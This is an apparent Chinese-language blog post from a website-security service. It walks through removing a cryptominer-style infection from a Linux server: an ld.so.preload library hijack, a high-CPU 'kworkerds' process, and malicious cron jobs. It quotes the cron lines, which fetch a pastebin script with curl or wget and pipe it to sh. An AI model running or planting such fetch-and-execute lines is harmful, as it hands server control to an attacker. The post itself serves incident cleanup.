解决 阿里云 云盾态势感知系统检测到您的服务器出现了紧急安全事件

  • A+

尊敬的***

阿里云提示  云盾态势感知系统检测到您的服务器出现了紧急安全事件

今天 收到阿里云的报警通知

解决 阿里云 云盾态势感知系统检测到您的服务器出现了紧急安全事件

于是联系我们 360°网站安全加固

我们技术工程师

查看/etc/ld.so.preload文件,里面连接到/usr/local/lib/libdns.so

[root@SJ-pre-release ~]# cat /etc/ld.so.preload
/usr/local/lib/libdns.so

查看/usr/local/lib/路径,看看是否有libdns.so文件

查看定时任务,发现存在一个陌生的定时任务,

 [root@SJ-pre-release ~]# crontab -l
*/23 * * * *	(curl -fsSL xxxxxx.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh

解决办法:

    ###清除/etc/ld.so.preload的内容
    [root@SJ-pre-release ~]# echo "" > /etc/ld.so.preload
   ### 删除/usr/local/lib/lib/libdns.so文件
    [root@SJ-pre-release ~]# rm -rf /usr/local/lib/lib/libdns.so
   ### 删除定时任务
    [root@SJ-pre-release ~]# cat /var/spool/cron/root
    */23 * * * *	(curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
    ##
    [root@SJ-pre-release ~]# rm -rf /var/spool/cron/root
    [root@SJ-pre-release ~]# cat /var/spool/cron/crontabs/root
    */31 * * * *	(curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh
    ##
    [root@SJ-pre-release ~]# rm -rf /var/spool/cron/crontabs/root

在这里插入图片描述

再次查看进程,发现有一个kworkerds,进程号为14711的进程,CPU占有率高达397.5%

[root@SJ-pre-release ~]# top
top - 09:12:50 up 229 days, 21:41,  9 users,  load average: 4.23, 4.12, 4.08
Tasks: 145 total,   1 running, 144 sleeping,   0 stopped,   0 zombie
%Cpu(s): 99.8 us,  0.2 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem:   8011936 total,  7647536 used,   364400 free,   303504 buffers
KiB Swap:        0 total,        0 used,        0 free.   301404 cached Mem

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
14711 root      20   0  566768  35644    756 S 397.5  0.4   1719:53 kworkerds
11701 root      20   0 4730228 797664  12764 S   1.7 10.0 536:07.20 java
18094 root      20   0       0      0      0 S   0.3  0.0   0:00.05 kworker/3:2
18155 root      20   0  123696   1684   1156 R   0.3  0.0   0:00.08 top
22408 root      20   0 1281204 193204   5124 S   0.3  2.4  77:45.91 node

在这里插入图片描述

使用ps命令查看该进程的路径

[root@SJ-pre-release ~]# ps -aux | grep 14711
root     14711  397  0.4 566768 35644 ?        Sl   02:00 1720:38 /tmp/kworkerds
root     18157  0.0  0.0 112644   984 pts/1    S+   09:13   0:00 grep --color=auto 14711
先删掉进程,再删除文件
[root@SJ-pre-release ~]# kill -9 14711
[root@SJ-pre-release ~]# ps -aux | grep 14711
root     18175  0.0  0.0 112644   984 pts/1    S+   09:13   0:00 grep --color=auto 14711
[root@SJ-pre-release ~]# rm -rf /tmp/kworkerds

在这里插入图片描述

        对于缺乏专业维护人员的网站,建议向 360°网站管家 咨询,我们竭诚为您服务
        下面有联系方式,QQ,微信,您可以随时咨询,我们为您排忧解难
  • 微信 wzgj360
  • 联系免费答疑
  • weinxin
  • QQ 613049615
  • 联系免费答疑
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: